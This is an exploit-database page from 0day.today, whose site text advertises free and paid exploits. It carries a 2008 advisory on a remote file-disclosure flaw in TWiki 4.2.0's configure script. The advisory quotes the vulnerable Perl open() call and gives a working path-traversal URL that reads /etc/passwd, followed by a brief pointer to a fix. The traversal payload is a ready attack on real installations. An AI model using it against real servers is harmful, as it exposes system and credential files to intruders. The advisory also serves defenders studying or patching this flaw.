0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TWiki 4.2.0 (configure) Remote File Disclosure Vulnerability
[============================================================
TWiki 4.2.0 (configure) Remote File Disclosure Vulnerability
============================================================
################################################################################################################
# #
# TWiki 4.2.0 File Disclosure Vuln (configure) #
# #
################################################################################################################
"We're brazilian newbies!!! :p" - Th1nk3r
Info
----------------------------------------------------------------------------------------------------------------
Classe : Input Validation Error
Remote : Yes
Local : No
Date : 05/08/2008
Credits : Th1nk3r (cnwfhguohrugbo / gmail.com)
Greetz : w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick.
Description
----------------------------------------------------------------------------------------------------------------
TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible
to exploit the bug if you can access the "/bin/configure" script.
Otherwise, you can not exploit this bug.
Vulnerable code of "/bin/configure" script:
if( $action eq 'image' ) {
# SMELL: this call is correct, but causes a perl error
# on some versions of CGI.pm
# print $query->header(-type => $query->param('type'));
# So use this instead:
print 'Content-type: '.$query->param('type')."\n\n";
if( open(F, 'logos/'.$query->param('image' ))) {
local $/ = undef;
print <F>;
close(F);
}
exit 0;
}
The bug is in the open() function. The file is set by visitor, and there is no protection added
by the programmer.
Note that "$query->param('type')" can be set by the visitor. Therefore, you'll set it to "text/plain".
Exploit
----------------------------------------------------------------------------------------------------------------
To exploit the bug, you just need set the "image" variable to the path of file you wish to view.
The file will be revealed if you have permission to view it.
By example, to show the "/etc/passwd" file content, go to :
http://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain
Solution
----------------------------------------------------------------------------------------------------------------
Read "http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide", Basic Installation, topic 8, for
more information of how to protect your "configure" script.
# 0day.today [2024-11-16] #